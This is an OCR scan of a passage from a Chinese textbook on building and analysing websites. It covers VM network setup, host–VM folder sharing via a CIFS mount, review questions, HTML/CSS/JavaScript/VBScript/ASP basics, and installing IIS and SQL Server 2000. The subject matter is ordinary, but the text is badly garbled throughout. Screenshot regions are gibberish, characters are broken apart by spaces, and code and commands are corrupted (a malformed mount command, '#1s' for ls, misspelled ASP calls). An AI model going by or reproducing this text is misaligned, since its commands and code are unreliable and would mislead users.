@ 在 该 对 话 框 中 选择 “Internet 协议 CTCP/IP)”~>* 属 性 ?项 ,打开 “Internet 协议 
(TCP/IP) 属性 ”对 话 框 如 图 1-16 所 示 ,为 虚拟 机 配置 与 本 机 IP 地 址 处 于 同一 网 段 的 IP 
地 址 。 


Internet 协议 (TCP/IP) 尾 性 到 x| 


TIP 地 址 0); [sz 168 .157 .128 


子 网 掩 码 D [255 .255 .255 .0 
默认 网 关 @): | 


全 目 动 奖 得 DNS 服务 器 地 焉 中) 
人 使 用 下 面 的 DNS 服务 器 地 址 外 :一 一 一 一 一 一 一 一 一 
首选 DNS 服务 器 ); | 

备用 DNS 服务 器 &); = 


CC ww | 
图 1-16 “Internet 协议 属性 ”对 话 框 


@ 选择 “开始 "一 “运行 "命令 ,输入 cmd, 进 入 命令 行 操作 窗口 ,在 该 窗口 内 输入 
ipconfig 命令 查看 虚拟 机 的 IP 地 址 信息 ,确认 其 是 否 生效 ,如 图 1-17 所 示 。 
@ 在 命令 行 操 作 窗 口内 输入 "ping 本 机 IP 地 址 ”命令 ,测试 虚拟 机 与 本 机 的 连通 性 
若 连通 ,显示 信息 如 图 1-18 所 示 。 
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IC:\Docunents and Settings Adninistrator>ipconf ig 


Mindows IP Configuration 


Ethernet adapter 本 


Connec ic DNS Suffix 
IP hdd 
Subnet M: 


Default Gateway 


cunents and Settings\hdministrator>。 


图 1-17 


Windows Server 2003 IP 地 址 


C:\Documents and Settings\hdministrator>ping 192.168.157.1 


Pinging 192.168.157.1 with 32 bytes of data: 


ns TIL=64 
s TIL=64 
s TIL=64 


from 192. 


Reply 


Ping sta 


ts and Settings Adninistrator> 


图 1-18 


152 共享 文件 夹 


乱 枉 


在 每 次 实验 操作 之 前 ,需要 在 本 机 与 虚拟 机 之 
站 源码 文件 上 传 到 虚拟 机 服务 器 中 ,或 从 虚拟 
机 服务 器 上 下 载 相关 日 志文 件 到 本 地 计算 机 
进行 分 析 。 本 小 节 将 介绍 在 本 地 计算 机 与 虚 
拟 机 之 间 如 何 设置 共享 文件 夹 ,方便 数据 
传递 。 

1. 在 本 机 设置 文件 夹 共 享 

在 本 机 Windows XP 操作 系统 中 设置 一 
个 共享 文件 夹 (如 d:\lamp) ,用 来 与 虚拟 机 传 
递 数据 ,具体 方法 为 : 选 定 d:\lamp 文件 夹 ,点 
击 鼠 标 右键 ,在 弹出 的 快捷 菜单 中 选择 “ 属 


性 ”, 在 文件 夹 属性 窗口 中 选择 “共享 ”选项 卡 ， 
如 图 1-19 所 示 。 在 “网 络 共享 和 安全 ”中 选中 


个 文件 夹 ” 及 “允许 网 络 用 户 


“在 网 络 上 共享 这 个 
复 选 框 。 


更 改 我 的 文件 ” 


虚拟 机 与 本 机 连通 性 测试 结果 


间 传 递 一 些 数据 ,如 将 本 机 内 相关 的 网 
了 zx 
常规 ”共享 | 自 定义 | 


本 地 共享 和 安全 
如 果 只 跟 这 台 计算 机 的 其 好 用 户 共 享 这 个 文件 来 
9 


+ 请 将 其 抑 动 到 共享 文档 文件 夹 。 


要 将 这 个 文件 夹 及 其 子 文件 来 设 为 专用 (只 有 您 可 
以 由 问 )， 博 选择 以 下 复 选 征 。 
rc 

网 络 共享 和 安全 

站 要 跟 网 络 用 户 和 这 台 计 算 机 的 其 地 用 户 共享 这 个 

Ei ,请 迁 择 下 面 的 弟 一 个 复 选 慌 ， 生 大 一 个 
共享 名 
vy 渤 同 雪上 共 训 不作 [Sy 
共享 名 中 
人 允许 网 络 用 户 更 改 我 的 文件 吧 ) 

了 解 共享 和 安全 的 更 多 信息 。 


jwWindows 防火 墙 配置 为 允许 此 文件 夹 与 网 络 上 其 地 计算 
机 共享 。 


ap 


查看 Windows 防火 墙 ; 


珊 
图 1-19 文件 夹 属性 窗口 


应 用 避 ) 
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2. Windows 2003 Server 虚拟 机 下 共享 文件 

在 本 机 与 Windows 2003 Server 虚拟 机 以 host-only 联网 方式 正确 连接 的 前 提 下 ,在 
Windows 2003 Server 虚拟 机 下 找到 本 机 所 设置 共享 文件 夹 (d:\lamp) 的 具体 操作 步骤 
如 下 : 

(1) 在 Windows 2003 Server 虚拟 机 下 ,双击 “我 的 电脑 ”图 标 , 在 弹出 窗口 的 地 址 栏 
中 输入 地 址 形式 :“\\ 本 机 的 IP 地 址 ”。 

(2) 因 本 机 IP 地 址 为 192. 168. 157. 1, 所 以 在 地 址 栏 中 输入 “\\192. 168. 157. 1” 后 ， 
按 Enter 键 ,搜索 结果 如 图 1-20 所 示 ,可见 本 机 中 的 所 有 共享 文件 夹 信息 。 


文件 他 ) 编辑 人 E) 查看 WW 收 硕 &) 工具 区) 帮助 0D 
回报 :日 " 人 | 部 抽 品 文 H 天 | 成 证 义 四 | 回 - 
她 本名 | 写 \\192. 168.157.1 


lp 


区 sa server 
Ee 
忆 个 对 象 网 


图 1-20 192. 168. 157. 1 中 共享 文件 夹 信 息 


(3) 打开 lamp 文件 夹 , 即 同 本 地 文件 夹 一 样 可 进行 复制 ,粘贴 等 操作 。 


3. Red Hat Enterprise Linux 5 虚拟 机 下 共享 文件 

在 本 机 与 Red Hat Enterprise Linux 5 虚拟 机 以 host-only 联网 方式 正确 连接 的 前 提 
下 ,在 Red Hat Enterprise Linux 5 虚拟 机 下 找到 本 地 计算 机 机 所 设置 共享 文件 夹 (d:\ 
lamp) 的 具体 命令 如 下 : 

#mkdir /windows 

#mount -tt cifs //192 168.157.1/lap /windows 

以 上 两 条 命令 操作 结果 是 在 虚拟 机 内 根 目录 下 创建 windows 文件 夹 ,然后 将 IP 地 
址 为 192. 168. 157. 1 的 XP 操作 系统 内 的 lamp 文件 夹 挂 载 到 刚刚 创建 的 windows 文件 
夹 上 : 

成 功 执行 以 上 命令 后 ,在 Linux 虚拟 机 内 操作 windows 文件 夹 , 就 相当 于 操作 本 机 
Windows XP 操作 系统 中 lamp 文件 夹 , 进 而 实现 文件 共享 。 

在 命令 终端 窗口 中 ,可 通过 以 下 命令 来 进行 测试 : 

# cd /Wwindows 

#1s 


在 Linux 虚拟 机 内 可 见 “/windows” 文 件 夹 中 内 容 与 本 机 Windows XP 操作 系统 中 
D:Nlamp 文件 夹 内 容 一 致 ,如 图 1-21 和 图 1-22 所 示 。 
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=|9jx| 
」 文件 加。 编辑 日” 查看。 收 若是” 工 具 D 和 助 ) | 名 
[AR 征文 天 | | 
| 地 址 @) | 局 ovamp 本 园 #| ||” 


甘 量 加 2.2.15.tar.gz | 6,440 KB WinRAR 

田 图 我 的 文档 mysq15.1.45-inuxri686-gibc23,tar,gz 119,877 KB WinRAR 

日 显 我 的 电脑 php-5.3.2.tar,gz 13,413KB WinRAR 
< WINxP (C:) 五 phpbba.0.7_pll_zh_phpbbchina'zp 2.824KB WinRAR 
“2 TooLS (0:) 


» 
SB) 


下 
|# 个 对 旬 ( 可 用 磁盘 空间 : 51.9 
图 1-21 Windows XP 操作 系统 中 D:\lamp 文件 夹 内 容 


root@localhost:/windows Ah- hb) 
文件 介 编辑 人 E) 查看 (W) 终端 (D 标签 @) 帮助 全 ) 

[rootelocalhost“]# mkdir /windows EE 
[root@localhost ~]# mount -t cifs //192.168.157.1/lamp /windows 

Password: 

[root@localhost ~]# cd /windows 

[root@localhost windows]# 1s 


[root@localhost windows]# 


图 1-22 Linux 虚拟 机 中 /windows 文件 夹 内 容 


习 题 1 


1. 选择 题 (可 多 选 ) 
(1) 小 李 正 在 家 里 通过 拨号 上 网 访问 网 易 主 页 ,此 时 ,他 自己 的 计算 机 ( i 


A. 是 客户 端 B. 既是 服务 器 端 ,又 是 客户 端 

C. 是 服务 器 端 D. 既 不 是 服务 器 端 ,又 不 是 客户 端 
(2) 小 李 正在 访问 自己 计算 机 上 的 网 页 ,此 时 ,他 自己 的 计算 机 ( 入 

A. 是 客户 端 B. 既是 服务 器 端 ,又 是 客户 端 

C. 是 服务 器 端 D. 既 不 是 服务 器 端 ,又 不 是 客户 端 
(3) 下 面 ( ) 属 于 Web 服务 软件 ,能 提供 基本 的 网 站 服务 功能 。 

A. IIS B. Apache C. Weblogic D. Tomcat 
(4) 最 基本 的 网 站 后 台 服 务 器 通常 会 安装 ( js 

A. Web 服务 软件 B. 数据 库 管 理 软件 

C. FTP 服务 软件 D. 应 用 服务 软件 


(5) HTTP 协议 具有 的 特点 是 ( Ns 
A. 支持 请 求 /响应 模式 
B. 无 连接 
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C. HTTP 允许 传输 任意 类 型 的 数据 对 象 


D. 无 状态 
(6) ASP 脚本 代码 是 在 ( ) 执 行 的 。 
A. 客户 端 B. 第 一 次 在 服务 器 端 ,以 后 在 客户 端 
C. 服务 器 端 D. 第 一 次 在 客户 端 ,以 后 在 服务 器 端 
(7) 下 面 ( ) 属 于 数据 库 管 理 软 件 , 能 提供 基本 的 数据 库 管理 功能 。 
A. MySQL B. DB2 C. Weblogic D. Oracle 
(8) 通常 一 个 完整 的 URL 包括 以 下 ( ) 部 分 。 
A. 端口 B. 域名 或 IP 地址 
C. 文件 名 D. 附加 资源 
2. 问答 题 


(1) 名 称 解 释 : 静态 网 页 .动态 网 页 .服务 器 端 、 客 户 端 、URL。 

(2) 请 说 明 C/S 模式 与 B/S 模式 有 何 区别 ? 

(3) 请 结合 URL 知识 , 简 述 静态 网 页 和 动态 网 页 的 工作 原理 。 

(4) 某 同学 开发 了 一 个 显示 来 访 时 间 的 ASP 文件 ,存放 在 C:\Inetpub\wwwroot 


下 ,然后 在 资源 管理 器 中 双击 该 文件 , 却 不 能 正常 显示 ,请 问 是 什么 原因 ? 
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(5) 列举 出 目前 主流 的 网 站 开发 平台 有 哪些 ,各 有 何 优 缺 点 ? 

(6) 最 基本 的 网 站 后 台 服 务 器 应 安装 哪些 软件 ,每 个 软件 起 到 什么 作用 ? 
(7) 请 说 明 虚 拟 机 有 哪些 联网 方式 ? 它们 之 间 有 何 区 别 ? 

(8) 请 说 明 目 前 最 新 的 网 站 后 台 架 构 技 术 情 况 。 


2 但 
礁 2 页 gp 网 站 构建 与 分 析 


1 ”ASP 网 站 常见 文件 


对 ASP 网 站 进行 构建 分 析 前 ,需要 了 解 ASP 网 站 常见 的 网 页 文件 ,能 够 简单 分 析 每 
种 文件 中 的 典型 脚本 代码 ,本 小 节 将 对 这 些 网 页 类 型 文件 逐一 进行 介绍 。 


211 HIML 文 件 


HTML 文件 是 基本 的 网 页 文件 ,HTML(Hypertext Marked Language, 超 文本 标记 
语言 ) 基 于 标签 来 描述 网 页 内 容 , 该 类 型 文件 是 由 浏览 器 解释 执行 的 ,扩展 名 为 html 或 
htm。 例 如 ,index. html。html 的 全 局 架构 模式 为 ， 
《html> 
< head> 
“title> 我 是 标题 < /title> 
< /head> 
< body> 
我 是 正文 
< /body> 
< /html> 
HTML 文件 的 标签 有 很 多 ,常见 的 除了 全 局 架构 模式 中 涉及 的 标签 ,还 有 : 


1. 文 本 标签 

二 p 二 二 /p 二 创建 一 个 段落 ,通常 用 来 放置 文字 。 

<div 二 二 /div 之 称 为 区 隔 标记 ,也 叫 层 ,用 来 设 定 字 \` 画 、 表 格 等 的 摆 放 位 置 。 可 恋 
入 丰富 的 CSS 标签 来 修饰 特定 对 象 。 

2. 图 片 标签 

< img src=” alt=” aligr=” border=” width=” height= “> 

img 标签 的 属性 : 

(1) src: 图 片 完 整 路 径 , 包 含 文件 名 ,可 使 用 相对 或 绝对 路 径 。 

(2) alt: 提示 语 。 

(3) align: 对 齐 方 式 。 
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(4) border: 边框 粗细 。 
(5) width: 图 片 宽 度 。 
(6) height: 图 片 高 度 。 


3. 超 链接 标签 

《a href= “http://iwm. ccpc. edu. cn”target= ”blank > 中 国 刑警 学 院 网 站 < /2> 
里 面 也 可 由 套 图 片 标签 ,如 二 a href 王 "http://www. ccpc. edu. cn" target 一 "_blank" 过 
<img src=""></a>。 

超 链 接 标签 属性 : 

(1) href: 链接 地 址 。 

(2) target: 单 击 超 链接 ,目标 页 面 在 哪个 窗口 打开 。 


4. 表格 标签 
例如 ,两 行 两 列 的 表格 的 标签 组 合 为 : 
《table> 

《<tr><td /td td /td tr> 


<tr Ct /oD td /dD < /tr> 
< /table> 


5. 表单 标签 

< form name= ””method=“post”actiorF ” target= “>《 /form> 

form 标签 的 属性 : 

(1) name: 唯一 标识 该 表单 。 

(2) methods: 有 两 种 值 get 或 post,get 指 表单 提交 时 在 地 址 栏 中 以 “? 控件 名 1= 
控件 值 1& 控件 名 2 三 控件 值 2&…” 的 形式 向 目标 页 面 进行 传 值 。 所 传 的 值 是 URL 参 
数 的 一 部 分 ,有 可 能 被 浏览 器 存储 在 历史 记录 中 ,还 有 可 能 被 存储 在 Web 服务 器 的 日 志 
中 ,因此 涉及 个 人 隐私 时 不 建议 使 用 get 方式 传 值 。get 方式 最 大 传输 数据 量 为 1KB, 而 
post 所 传输 的 数据 量 要 大 得 多 ,而且 不 在 地 址 栏 里 显示 所 传递 数值 的 内 容 。 

(3) action: 该 属性 表示 表单 提交 的 目标 页 面 。 

(4) target: 表示 该 表单 内 容 被 提交 时 ,目标 页 面 是 否 在 新 的 窗口 打开 。 


6. 输入 框 标 签 

form 标签 里 面 通常 会 包含 一 个 或 多 个 输入 框 标签 二 input 二 ,所 input 二 标签 用 于 搜 
集 用户 信 息 ,根据 不 同 的 type 属性 值 , 输 入 字段 拥有 很 多 种 形式 。 输 入 字段 可 以 是 文本 
字段 、 复 选 框 . 掩 码 后 的 文本 控件 . 单 选 按钮 .按钮 等 。 文 本 输入 框 使 用 形式 为 ， 


< input type= “text” name= “> 
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212 CSS 文件 


CSS(Cascading Style Sheets , 层 三 样式 表 ) 用 来 定义 网 页 的 外 观 和 布局 ,如 字体 、 边 
缘 等 。 该 类 型 文件 由 浏览 器 解释 执行 ,扩展 名 为 css。 它 也 是 由 特定 标签 组 成 ,具有 css、 
style stylesheet 等 关键 字 ,使 用 方法 如 下 。 


1. 藤 入 样式 表 
直接 在 html 或 asp 页 面 内 使 用 二 style 二 标签 定义 特定 网 页 控件 的 外 观 。 
例如 : 


< style> 
imgf 
border :10px solid blue 
} 
< /style> 


2. 链接 到 外 部 样式 表 
可 以 创建 单独 的 CSS 文件 如 a. css, 在 HTML 或 ASP 页 面 内 使 用 一 link 二 标签 调用 
所 定义 的 CSS 文件 来 实现 对 网 页 的 外 观 及 布局 设置 ,使 用 方法 如 下 : 


< link rel= “stylesheet” href= “css/a.css” type= “text/css’> 


213 ” ”JavaScript 文件 


JavaScript 是 由 Sun 公司 及 网 景 Netscape 公司 开发 的 ,通过 JavaScript 脚本 可 以 在 
客户 端 实现 网 页 的 动态 效果 。 常 见 的 有 一 些 简 单 的 网 页 输入 信息 格式 的 校 验 和 在 网 页 中 
显示 万 年 历 . 公 告 信息 自动 翻滚 ,不 断 移 动 的 图 片 .字符 围绕 鼠标 不 停 地 动 等 特效 来 增强 
网 页 与 用 户 之 间 的 互动 。 该 类 型 文件 是 由 浏览 器 解释 执行 的 ,扩展 名 为 js, 包含 
JavaScript script js 等 关键 字 ,JavaScript 在 html 中 使 用 二 script 二 … 近 /script 二 标记。 
单行 程序 叙述 以 分 号 ";” 做 结尾 ,函数 或 条 件 式 定义 为 大 括号 部 分 。script 区 可 以 放置 在 
二 head 标 头 区 或 二 body 二 正文 区 ,使 用 方法 同 CSS 文 件 ,具体 方法 如 下 。 


1. 直接 在 him 或 asp 页 面 内 使 用 < script> 标签 定义 动态 效果 


< script type= text/javascr ipt> 
alert (‘hello!’); 
< /script> 


2. 链接 到 外 部 JS 文件 
可 以 创建 单独 的 JS 文 件 ,如 a.js, 在 HTML 或 ASP 页面 内 使 用 二 script 盖 标签 调用 
所 定义 的 JS 文 件 来 实现 对 网 页 的 客户 端 动态 效果 设置 ,使 用 方法 如 下 : 


< script src= “include/a. js >《 /script> 
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语言 


214 VBScript 文件 


VBScript 是 微软 公司 开发 的 Visual Basic 语言 的 一 个 子 集 ,是 专门 为 IE 开发 的 编程 
,为 ASP 默认 的 脚本 编程 语言 。 使 用 VBScript 即 可 以 编写 服务 器 端 脚本 ,也 可 以 编 


写 客户 端 脚本 。 


1. 编写 服务 器 端 脚本 

(1) 可 以 直接 将 VBScript 代码 放置 在 二 % 和 % 二 标识 符 之 间 ,格式 如 下 : 
《%VBScript 代码 %> 

(2) 将 脚本 代码 放置 在 二 script 二 和 所 /script 一 标记 之 间 ,格式 如 下 : 


< script language= “vbscript” runat= “server > 
…VBScript 代码 
< /script> 


2. 编写 客户 端 脚本 
VBScript 脚本 代码 可 以 与 HTML 文档 结合 在 一 起 使 用 ,并 且 可 以 将 VBScript 脚本 


代码 放置 在 HTML 文档 中 的 任何 位 置 , 如 在 head 或 body 部 分 中 。 通 常情 况 下 ,将 脚本 
代码 放 在 head 部 分 中 ,这样 可 以 集中 放置 所 有 脚本 代码 ,便于 查看 ,使 用 方法 同 JS 文件 ， 
其 语法 格式 如 下 : 


《script language= "脚本 语言 ”[event= “事件 名 称 ][for= ”对象 名 称 人 > 
芝 对 关 

…// 肢 本 代码 

--> 

< /script> 


language: 用 于 指定 脚本 代码 所 使 用 的 脚本 语言 ,其 参数 值 可 以 为 VBScript、 


JavaScript 、JScript 等 。 


event: 用 于 指定 与 脚本 代码 相关 联 的 事件 。 
for: 用 于 指定 与 脚本 代码 相关 联 的 对 象 。 


215 ASP 文件 
ASP(Active Server Page, 动 态 服务 器 页 面 ) ,是 微软 公司 开发 的 代替 CGI 脚本 程序 


的 一 种 服务 器 端 脚本 编程 语言 ,用 来 创建 Web 应 用 程序 ,其 可 以 与 数据 库 或 其 他 程序 进 
行 交互 。ASP 网 页 文件 可 以 包含 HTML 标记 .CSS 标记 、 普 通 文本 .脚本 命令 以 及 COM 
组 件 等 ,扩展 名 为 asp。 


1. ASP 网 页 特点 
利用 ASP 可 以 向 网 页 中 添加 交互 式 内 容 ( 如 在 线 表单 ), 也 可 以 创建 使 用 html 网 页 


作为 用 户 界面 的 Web 应 用 程序 。 与 静态 的 HTML 网 页 相 比 ,ASP 网 页 具有 以 下 特点 : 
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(1) 利用 ASP 可 以 实现 突破 静态 网 页 的 一 些 功 能 限制 ,实现 动态 网 页 技术 。 

(2) ASP 文件 包含 在 HTML 代码 所 组 成 的 文件 中 ,易于 修改 和 测试 。 

(3) 服务 器 上 的 ASP 解释 程序 会 在 服务 器 中 解释 执行 ASP 程序 ,并 将 结果 以 
HTML 格式 传送 到 客户 端 浏览 器 上 ,因此 使 用 各 种 浏览 器 都 可 以 正常 浏览 ASP 所 产生 
的 网 页 。 

(4) ASP 提供 了 一 些 内 置 对 象 ,使 用 这 些 对 象 可 以 使 服务 器 端 脚本 功能 更 强 。 例 如 ， 
可 以 从 Web 浏览 器 中 获取 用 户 通过 HTML 表单 提交 的 信息 ,并 在 脚本 中 对 这 些 信息 进 
行 处 理 , 然 后 向 Web 浏览 器 发 送信 息 。 

(5) ASP 可 以 使 用 服务 器 端 ActiveX 组 件 来 执行 各 种 各 样 的 任务 ,如 存 取 数据 库 、 发 
送 和 接收 E-mail 及 访问 文件 系统 等 。 

(6) 由 于 服务 器 是 将 ASP 程序 执行 的 结果 以 HTML 格式 传 回 到 客户 端 浏览 器 , 因 
此 使 用 者 不 会 看 到 ASP 所 编写 的 原始 程序 代码 ,可 防止 ASP 程序 代码 被 窃取 。 

(7) ASP 脚本 嵌入 到 二 %…% 二 标记 中 ,通常 发 布 在 由 微软 公司 推出 的 Windows 
Server 版 本 操作 系统 中 自 带 的 IIS Web 服务 器 里 。 


2 ASP 常见 内 置 对 象 

ASP 内 置 对 象 是 ASP 的 核心 ,ASP 的 主要 功能 都 建立 在 这 些 内 置 对 象 的 基础 之 上 。 
下 面 对 常 见 的 5 个 ASP 内 置 对 象 进行 逐一 介绍 。 

(1) Request 对 象 一 一 获取 客户 端 传人 信息 。 

Request 对 象 是 ASP 中 最 为 常用 的 内 置 对 象 之 一 。 在 客户 端 /服务 器 结构 中 , 当 客 
户 端 Web 页 面向 网 站 服务 器 端 传 递 信息 时 ,Request 对 象 能 够 获取 客户 端 提交 的 全 部 信 
息 。 信 息 包 括 客户 端 用 户 的 HTTP 变量 、 在 网 站 服务 器 端 存 放 的 客户 端 浏 览 器 的 Cookie 
数据 、 附 于 URL 之 后 的 字符 串 信 息 、 页 面 中 表单 传送 的 数据 以 及 客户 端 认证 等 。 

例如 ,创建 文件 index. asp 建立 表单 ,关键 代码 如 下 : 

< form name= “forml” method= “post”actiorF ”index_show. asp > 

<P> 用户 名 :< input type= “text” name= “name” size= 20> < /p> 
《p> 密码:< input type= “password” name= “pwd” size= 20> < /p> 
《p>《 input type= “submit”value= “确定 “>< /p> 


“for 
创建 文件 index_show. asp 用 来 取得 传递 的 数据 并 显示 ,关键 代码 如 下 : 


《p> 您 的 用 户 名 是 :《%= Request.Form(mame)>< /p> 

《 户 您 的 密码 是 :<%= Request Form(pwd”)> < /p> 

(2) Response 对 象 向 客户 端 发 送信 息 。 

Response 对 象 是 ASP 内 置 对 象 中 可 以 直接 对 客户 端 发 送 数据 的 对 象 。Request 请 
求 对 象 与 Response 响应 对 象形 成 了 客户 请 求 /服务 器 响应 的 模式 。Response 对 象 用 于 
动态 响应 客户 端 请 求 ,并 将 动态 生成 的 响应 结果 返回 给 客户 端 浏 览 器 。 

例如 ,在 一 个 信息 查询 的 页 面 中 , 当 用 户 输入 查询 条 件 并 提交 到 服务 器 时 ,需要 编写 
一 个 ASP 程序 ,通过 用 户 输入 的 查询 条 件 来 查找 数据 库 中 的 数据 ,并 将 查找 的 结果 返回 
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到 用 户 浏 览 器 。 在 编写 的 ASP 程序 中 ,需要 使 用 Request 对 象 获 取 用 户 的 查询 条 件 , 然 
后 用 Response 对 象 将 查找 的 结果 返回 给 用 户 。 

(3) Session 对 象 。 

HTTP 是 基于 无 连接 的 通信 协议 ,无 法 在 用 户 浏览 网 页 期 间 跟 踪 用 户 。ASP 提供 
Session 对 象 用 于 管理 用 户 会 话 , 使 用 Session 对 象 可 以 存储 用 户 个 人 会 话 所 需 的 信息 。 
当 用 户 在 Web 站 点 中 对 不 同 页 面 进行 切换 时 ,存储 在 Session 对 象 中 的 变量 不 会 被 清除 。 
使 用 Session 对 象 变量 可 以 实现 用 户 信 息 在 多 个 Web 页 面 间 共享 ,还 可 以 用 来 跟踪 浏览 
者 的 访问 路 径 。 

例如 ,通过 Session 对 象 定义 一 个 会 话 级 变量 ,代码 如 下 : 


< % Session(UserName )= “UserWang’% > 


(4) Application 对 象 。 

Application 对 象 中 包含 的 数据 可 以 在 整个 网 站 中 被 所 有 用 户 使 用 ,并 且 可 以 在 网 站 
运行 期 间 持久 保存 数据 。Application 对 象 是 网 站 建设 中 经 常 使 用 的 一 项 技术 ,利用 
Application 对 象 可 以 完成 统计 网 站 的 在 线 人 数 、 创 建 多 用 户 游戏 以 及 多 用 户 聊天 室 等 功 
能 。 应 用 程序 中 可 以 通过 给 定 的 变量 名 读 取 指 定 变量 的 值 。 例 如 ,在 页 面 中 显示 会 话 变 
量 的 信息 可 以 写成 如 下 格式 : 

《<%= Application( 变 量 名 ?%> 或 

《% Response.Write Application( 变 量 名 ?) %> 

(5) Server 对 象 。 

Server 对 象 工作 在 Web 服务 器 端 ,提供 了 对 服务 器 属性 和 方法 的 访问 ,从 而 用 来 获 
取 Web 服务 器 的 特性 和 设置 。 最 常用 的 方法 就 是 用 来 创建 COM 组 件 的 Server. 
CreateObject 方法 。 其 他 方法 可 对 字符 串 应 用 URL 或 HTML 编码 .将 虚拟 目录 映射 到 
物理 路 径 , 以 及 设置 脚本 超时 期 间 等 。 

例如 ,应 用 Server 对 象 创建 一 个 名 为 Conn 的 ADODB 对 象 实 例 , 代 码 如 下 : 

<% 

Dim Comn 
set ConnF= Server. Create0bject (“ADODB. Connection) 
%> 


33 ”上 典型 ASP 网 站 构建 方法 


221 运行 平台 搭建 
在 服务 器 要 想 发 布 ASP 动态 网 站 ,必须 搭建 ASP 的 运行 平台 ,包括 Web 服务 器 ,应 
用 服务 器 及 数据 库 服务 器 。 本 小 节 使 用 VMware Player 4.0. 1 软件 ,创建 Windows 2003 
Server 虚拟 机 作为 服务 器 ,在 该 环境 下 介绍 这 些 服务 器 软件 的 安装 方法 。 
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1. 安装 蛤 服务 组 件 

IIS 是 ASP 赖 以 运行 的 基础 ,因此 在 运行 ASP 网 站 之 前 ,首先 要 安装 IS。IIS 已 经 
被 作为 组 件 集成 到 Windows 操作 系统 中 ,如 果 用 户 在 安装 操作 系统 时 选择 安装 了 IIS ,就 
不 再 需要 单独 进行 安装 ,如 果 在 安装 时 用 户 没有 选择 安装 IIS ,可 以 像 安 装 其 他 Windows 
组 件 一 样 进行 安装 。 具 体 的 操作 步骤 如 下 : 

(1) 进入 控制 面板 ,双击 “添加 或 删除 程序 ”图 标 ,打开 “添加 /删除 程序 ”对 话 框 。 在 
左边 项 目 栏 中 , 单 击 “添加 /删除 Windows 组 件 ” 按 钮 ,安装 程序 启动 后 ,打开 如 图 2-1 所 
示 的 对 话 框 。 

到 


Yindors 姐 件 
可 以 添加 或 删除 Windows 的 组 件 。 | 


门 电 远 释 存 铺 3.5 甩 本 
描述 ; 镍 s ASP. HET ，Internet 信息 服务 CTS) 和 应 用 程序 服务 器 控制 

所 需 磁 盘 空间 14.1 WB 

可 用 磁 和 空 间 : 38903.2 上 Ei | 


sum-Em] mW | WW | 


图 2-1 “Windows 组 件 向 导 ” 对 话 框 


(2) 在 “Windows 组 件 向 导 ” 对 话 框 的 组 件 列表 框 中 选中 “应 用 程序 服务 器 ”, 然 后 单 
击 “ 详 细 信 息 ” 按 钮 ,打开 “应 用 程序 服务 器 ”对 话 框 ,在 组 件 列 表 框 中 选中 “Internet 信息 
服务 (IIS)” 复 选 框 ,如 图 2-2 所 示 , 然 后 单 击 “ 确 定 ” 按 钮 ,随后 根据 提示 插入 Windows 安 
装 光盘 ,一 步 步 安装 即 可 。 


ete 区 ra 


描述 IIS 包括 fab,， FIP ,SMTP 和 BRTF 支持 ， 以 及 对 FrontPage Server 
Ketension Rl Netive Surver Ya SP) NN 


所 裔 谤 盘 裤 间 : 141 吧 MD 
可 用 而 盘 裤 间 : Ee 


38858.3 上 
m | 
图 2-2 “应 用 程序 服务 器 ?对 话 框 
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(3) 安装 完毕 后 ,在 IE 浏览 器 中 输入 http://127.0.0.1, 如 果 能 显示 IIS 欢迎 字样 ， 
就 表示 安装 成 功 。 

2. 开启 ASP 模块 

ASP 应 用 服务 器 作为 IIS 的 模块 默认 未 开启 ,要 想 IIS 服务 器 能 够 发 布 运行 ASP 网 
站 ,需要 将 ASP 应 用 服务 器 开启 ,具体 操作 方法 是 在 IIS 管理 界面 中 右 击 "Web 服务 扩 
展 ” 选 项 ,弹出 窗口 如 图 2-3 所 示 。 选 择 右面 窗口 中 的 “Active Server Pages 禁止 ?项 ， 
单 击 中 间 窗 口中 的 “允许 ?按钮 即 可 。 


TICTTIETTOTETTE 区 =/9lxl 
号 文件 @， 操作 和) 查看 WW) 窗口 轨 。 帮助 中 |=18lx| 
艰 || 加 | 办 加 加 | 岛 | 旦 | 下 1 


Internet 信息 服务 脚 Teb 服务 扩展 
日 蔓 ccPc-8kFv2954B8 (本 地 计 


习 应 用 程序 池 7 | Web 
由 司 网 6 也 所 有 未 知 ISAPI 扩展 禁止 
了 了 ap 服务 扩展 gg | 有 展 本 上 
3 a 
属性 a 禁止 
固 在 服务 器 端的 包含 文件 禁止 
任务 
她 添加 一 个 新 的 Yeb 服务 扩展 
闻 对 尾 定 的 应 用 程序 允许 所 有 
Yeb 服务 扩展 
轩 禁止 所 有 Web 服务 扩展 
会 打开 帮助 = 可 
1 加 、\ 扩 展 人 BE7 


图 2-3 Web 服务 扩展 


3. 安装 SQL Server 数 据 库 

Microsoft SQL Server 2000 由 一 系列 相互 协作 的 组 件 构成 ,能 满足 最 大 的 Web 站 点 
和 企业 数据 处 理 系 统 存储 和 分 析 数 据 的 需要 。SQL Server 2000 有 4 个 版 本 : 企业 版 / 标 
准 版 /个 人 版 /开发 版 。 企 业 版 和 标准 版 需要 安装 在 服务 器 操作 系统 上 ,如 Windows NT 
Server/ Windows 2000 Server/Windows 2003 Server 等 ;个 人 版 可 以 安装 在 个 人 版 的 操 
作 系 统 上 ,如 Windows98/Windows 2000 Professional/Windows XP Home/Windows XP 
Professional 等 ;开发 版 可 以 安装 在 任何 微软 的 操作 系统 上 。 在 Windows 20003 Server 
操作 系统 中 安装 SQL Server 2000 个 人 版 时 ,将 SQL Server 2000 个 人 版 安装 光盘 插入 光 
驱 后 ,安装 程序 会 自动 弹出 运行 界面 ,大 部 分 选择 根据 安装 向 导 的 默认 选项 进行 即 可 , 需 
要 注意 的 是 以 下 两 个 问题 : 

(1) 在 “安装 定义 ”窗口 中 选择 “服务 器 和 客户 端 工具 ” 单 选 按 钮 ,如 图 2-4 所 示 。 

(2) 在 “身份 验证 模式 ”窗口 里 ,如 果 你 的 操作 系统 是 Windows NT 以 上 ,选择 
“Windows 身份 验证 模式 ? 即 可 ;如 果 操 作 系统 是 Windows 9X, 就 建议 选择 “混合 模式 " 单 
选 按钮 。 为 sa 用 户 设 定 密码 ,如 图 2-5 所 示 。 
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可 从 下 列 安装 类 型 中 选择 一 个 。 
个 避 客 户 端 工具 [C] 
© RI 从 


个 仅 连 接听 ) 


该 选项 使 您 往 以 安装 服务 器 和 客户 端 工具 。 如 果 您 
想 建 立 具 有 管理 功能 的 服务 器 ， 请 使 用 该 选项 。 


WW | 《上 - 步 四 [上 四 让 mw | 
图 2-4 “安装 定义 ”窗口 


加 | 
选择 身份 验证 模式 。 
个 Windows 身 份 验证 模式 [W] 
混合 模式 ( Windows 身 份 验证 和 SQL Server 身 份 验证 ) M) 


添加 sa 登录 密码 : 


_ 矶 | Wh | 
